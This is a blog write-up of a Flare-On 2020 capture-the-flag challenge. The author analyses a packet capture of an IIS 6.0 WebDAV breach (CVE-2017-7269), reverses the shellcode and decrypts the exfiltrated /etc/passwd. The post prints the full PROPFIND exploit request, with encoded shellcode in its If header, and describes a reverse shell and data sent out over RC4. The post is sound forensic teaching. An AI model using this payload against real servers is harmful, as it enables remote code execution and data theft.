<!doctype html><html lang=en-us>
<head>
<meta charset=utf-8>
<meta name=author content>
<meta name=description content>
<meta name=keywords content>
<meta name=viewport content="width=device-width,minimum-scale=1,initial-scale=1">
<meta name=generator content="Hugo 0.88.1">
<link rel=canonical href=https://starfleetcadet75.github.io/posts/flareon-2020-7-recrowd/>
<meta property="og:title" content="Flare-On CTF 2020 Challenge 7: re_crowd">
<meta property="og:description" content="Here at Reynholm Industries we pride ourselves on everything. It&rsquo;s not easy to admit, but recently one of our most valuable servers was breached. We don&rsquo;t believe in host monitoring so all we have is a network packet capture. We need you to investigate and determine what data was extracted from the server, if any.">
<meta property="og:type" content="article">
<meta property="og:url" content="https://starfleetcadet75.github.io/posts/flareon-2020-7-recrowd/"><meta property="article:section" content="posts">
<meta property="article:published_time" content="2020-09-24T00:00:00+00:00">
<meta property="article:modified_time" content="2020-09-24T00:00:00+00:00">
<meta name=twitter:card content="summary">
<meta name=twitter:title content="Flare-On CTF 2020 Challenge 7: re_crowd">
<meta name=twitter:description content="Here at Reynholm Industries we pride ourselves on everything. It&rsquo;s not easy to admit, but recently one of our most valuable servers was breached. We don&rsquo;t believe in host monitoring so all we have is a network packet capture. We need you to investigate and determine what data was extracted from the server, if any.">
<meta itemprop=name content="Flare-On CTF 2020 Challenge 7: re_crowd">
<meta itemprop=description content="Here at Reynholm Industries we pride ourselves on everything. It&rsquo;s not easy to admit, but recently one of our most valuable servers was breached. We don&rsquo;t believe in host monitoring so all we have is a network packet capture. We need you to investigate and determine what data was extracted from the server, if any."><meta itemprop=datePublished content="2020-09-24T00:00:00+00:00">
<meta itemprop=dateModified content="2020-09-24T00:00:00+00:00">
<meta itemprop=wordCount content="740">
<meta itemprop=keywords content="reversing,forensics,">
<link rel=stylesheet href=/css/layout.css>
<link rel=stylesheet href=/css/default-dark.css>
<link rel=stylesheet href=/css/adoc-html5-extension.css>
<title>
Flare-On CTF 2020 Challenge 7: re_crowd
</title>
</head>
<body>
<div class=main>
<header>
<div class=header-bar>
<nav>
<div class=siteTitle>
<a href=https://starfleetcadet75.github.io/>starfleetcadet75</a>
</div>
<a class=nav-item href=/about/><div class=nav-item-title>About</div></a>
<a class=nav-item href=/readinglist/><div class=nav-item-title>Reading List</div></a>
<a class="nav-item active" href=/posts/><div class=nav-item-title>Posts</div></a>
</nav>
<div class=social-links-header style=visibility:hidden;display:none>
<a href=mailto:starfleetcadet75@gmail.com><div class=social-link>email</div></a>
<a href=https://github.com/starfleetcadet75 target=_blank><div class=social-link>gh</div></a>
<a href=https://gitlab.com/starfleetcadet75 target=_blank><div class=social-link>gl</div></a>
</div>
</div>
</header>
<article class=post>
<h1 class=title> Flare-On CTF 2020 Challenge 7: re_crowd </h1>
<div class=content> <h2 id=challenge>Challenge</h2>
<blockquote>
<p>Hello,<br>
Here at Reynholm Industries we pride ourselves on everything.
It&rsquo;s not easy to admit, but recently one of our most valuable servers was breached.
We don&rsquo;t believe in host monitoring so all we have is a network packet capture.
We need you to investigate and determine what data was extracted from the server, if any.<br>
Thank you</p>
</blockquote>
<h2 id=analyzing-the-packet-capture>Analyzing the Packet Capture</h2>
<p>This is an excellent real-world challenge that jokingly highlights the all too common issue of clients relying solely on basic network monitoring.
Fortunately, this challenge can be solved without any host logs.
We are provided with a <a href="https://github.com/starfleetcadet75/writeups/blob/master/2020-Flareon-CTF/recrowd/re_crowd.pcapng?raw=true">pcap</a> file that contains traffic from the compromised network.</p>
<p>The pcap is fairly small and appears to show conversations that occurred between a client at 192.168.68.21 and presumably the important server located at 192.168.68.1.
The client starts by looking up the server at <em>it-dept.reynholm-industries.com</em>.</p>
<p><img src=https://raw.githubusercontent.com/starfleetcadet75/writeups/master/2020-Flareon-CTF/recrowd/initial_request.PNG alt=initial_request></p>
<p>The first sequence of HTTP requests are sent to access the content hosted on the Microsoft IIS 6.0 webserver.
We can use Wireshark&rsquo;s export objects feature to dump the HTTP content to disk and view the webpage ourselves.</p>
<p><img src=https://raw.githubusercontent.com/starfleetcadet75/writeups/master/2020-Flareon-CTF/recrowd/webpage.png alt=webpage></p>
<p>The attacker then initiated a scan of the webserver and eventually determined that it responds to the <code>PROPFIND</code> method included in a HTTP request.</p>
<p><img src=https://raw.githubusercontent.com/starfleetcadet75/writeups/master/2020-Flareon-CTF/recrowd/scan.PNG alt=scan></p>
<p>Once the attacker identified the potentially interesting method, he began attempting to throw custom requests containing what appears to be encoded shellcode in a malicious header:</p>
<pre tabindex=0><code class=language-none data-lang=none>PROPFIND / HTTP/1.1
Host: 192.168.68.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
If: &lt;http://192.168.68.1:80/AFRPWWBVQzHpAERtoPGOxDTKYBGmrxqhVCdIGMmNDzefUMySmeCdKhFobQXIDkhgEpnMeUniloxaFrfDCCBprACtWhHkrCVphXAmetqJqxATcnuåä¶å¥æ¡®ççæä©¥çäçæ©ç±å³ååÈÈáæ ä´ææ¥©ç©´å¹æ½åç¥ä³æ¥¸ç¥å¬ç¥¹ä½³ç¡æµ§æç¡æ½ä©áæ &gt; (Not &lt;locktoken:write1&gt;) &lt;http://192.168.68.1:80/oxamUvbohSEvpUpVuakwGpSnAQoMYMshqrvwwjFDLrhpIfQlgCdAlvwhrhCpWoKXCgOMkAbpjBnwLDdfCGcxCAyShpvGEmVwncZIIFDjgilqkGtäçäå¥¥ææ¢ä±¥äç°åäµ¬ç¨æ©æáæ ïç½ä©ä±åªä©áæ å©¡äçæ¥§ä¥æ¥ç¥´å¥ææ ë¬ç¼ïç¾â£ç»áçºïç»ääî¸¢ç»é ç¼â¥ç¾â£ç»é¯Ïíç½ä£ç»â ç¿ïç»ï°ç»ïç¾è°ç½è°ç½â£ç»éÏíç½èç»â£ç»ééæç¾å¹ìäVVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA&gt;
</code></pre><p>From packet number 123 to 279, the attacker sent variants of this request and the server responded to each with an <em>Internal Server Failure</em> message.
At packet number 280 however, we can see that a successful reverse connection was initiated from the server to the attacker&rsquo;s system on port 4444.
The attacker then pushed the second stage of their payload to the server at packet number 290, which then exfiltrated data to port 1337 at packet number 294.</p>
<p><img src=https://raw.githubusercontent.com/starfleetcadet75/writeups/master/2020-Flareon-CTF/recrowd/success.PNG alt=success></p>
<h2 id=reversing-the-shellcode>Reversing the Shellcode</h2>
<p>We have obtained the data that was exfilled from the server, however the shellcode encrypted its contents before sending it so we will need to figure out the type of encryption used and the key.
Some simple searching for exploits related to the <code>PROPFIND</code> HTTP method leads us to <a href=https://www.trendmicro.com/en_us/research/17/c/iis-6-0-vulnerability-leads-code-execution.html>CVE-2017-7269</a>.</p>
<blockquote>
<p>Microsoft Internet Information Services (IIS) 6.0 is vulnerable to a zero-day Buffer Overflow vulnerability (CVE-2017-7269) due to an improper validation of an ‘IF’ header in a PROPFIND request.</p>
</blockquote>
<p>The article includes a <a href=https://github.com/edwardz246003/IIS_exploit/blob/master/exploit.py>link to a PoC script on GitHub</a> that looks very similar to what we are dealing with.
Based on the shellcode variable, we can determine what part of the successful exploit packet we need to extract.</p>
<p><img src=https://raw.githubusercontent.com/starfleetcadet75/writeups/master/2020-Flareon-CTF/recrowd/extract_shellcode.PNG alt=extract_shellcode></p>
<p>There is also <a href=http://javiermunhoz.com/blog/2017/04/17/cve-2017-7269-iis-6.0-webdav-remote-code-execution.html>another detailed writeup available</a> that walks through how both the buffer overflow and exploit work.
Towards the end of the article, the author provides a screenshot showing the exact state of the shellcode as it is first executed.
It appears that the shellcode needs to be UTF-16 encoded before being placed in memory.
We can use Cyberchef to accomplish this:</p>
<p><img src=https://raw.githubusercontent.com/starfleetcadet75/writeups/master/2020-Flareon-CTF/recrowd/decoded_shellcode.png alt=decoded_shellcode></p>
<p>We will use <a href=https://github.com/adamkramer/jmp2it/>jmp2it</a> to debug the shellcode.
Before we can run it, we will need to prepend a large NOP sled so that it has room to unpack itself.
The final version of stage1.bin can be found <a href="https://github.com/starfleetcadet75/writeups/blob/master/2020-Flareon-CTF/recrowd/stage1.bin?raw=true">here</a>.</p>
<p>Using x64dbg we can run the shellcode up until the first instruction is reached.
At this point, we need to correctly setup the register state so that it will execute correctly.
We can manually copy the register values from the article&rsquo;s screenshot.
The ESI register needs to equal the address of the first instruction and ECX needs to equal the address of the first instruction minus 0x60.</p>
<p><img src=https://raw.githubusercontent.com/starfleetcadet75/writeups/master/2020-Flareon-CTF/recrowd/registers.png alt=registers></p>
<p>The shellcode eventually reaches a receive loop where the contents of <a href="https://github.com/starfleetcadet75/writeups/blob/master/2020-Flareon-CTF/recrowd/stage2.bin?raw=true">stage2.bin</a> are written.
We can manually copy/paste the raw bytes into the buffer allocated by <code>VirtualAlloc</code> and flip the zero flag to exit the loop.</p>
<p><img src=https://raw.githubusercontent.com/starfleetcadet75/writeups/master/2020-Flareon-CTF/recrowd/stage2_data.png alt=stage2_data></p>
<p>Continuing to step through the second stage in the debugger, we begin to notice the familiar sight of RC4 and eventually notice what looks like a key.</p>
<p><img src=https://raw.githubusercontent.com/starfleetcadet75/writeups/master/2020-Flareon-CTF/recrowd/password.png alt=password></p>
<p>Packet number 294 contains the encrypted exfilled data that was sent to port 1337.
We can copy/paste the hexdump of the packet into Cyberchef and use the RC4 function with the passphrase &ldquo;intrepidmango&rdquo; to recover the contents of the /etc/passwd file.</p>
<p><img src=https://raw.githubusercontent.com/starfleetcadet75/writeups/master/2020-Flareon-CTF/recrowd/flag.png alt=flag></p>
</div>
<footer class=post-footer>
<div class=post-footer-data>
<div class=tags>
<div class=tag>
<a href=/tags/reversing>#reversing</a>
</div>
<div class=tag>
<a href=/tags/forensics>#forensics</a>
</div>
</div>
<div class=post-footer-meta>Permalink: <a href=https://starfleetcadet75.github.io/posts/flareon-2020-7-recrowd/>/posts/flareon-2020-7-recrowd/</a> | Date: 2020-09-24 </div>
<hr>
<div class=categories>
Published in:
<div class=category>
<a href=/categories/writeups>writeups</a>
</div>
</div>
<div class=series>
</div>
</div>
</footer>
</article>
<footer>
<div class=social-links-footer>
<a href=mailto:starfleetcadet75@gmail.com><div class=social-link>Email</div></a>
<a href=https://github.com/starfleetcadet75 target=_blank><div class=social-link>GitHub</div></a>
<a href=https://gitlab.com/starfleetcadet75 target=_blank><div class=social-link>GitLab</div></a>
<div class=social-link>
<a href=https://starfleetcadet75.github.io/index.xml target=_blank>RSS</a>
</div>
</div>
<div class=copyright> </div>
<div class=poweredby>
Powered by <a href=https://gohugo.io/>Hugo</a>.
</div>
</footer>
</div>
</body>
</html>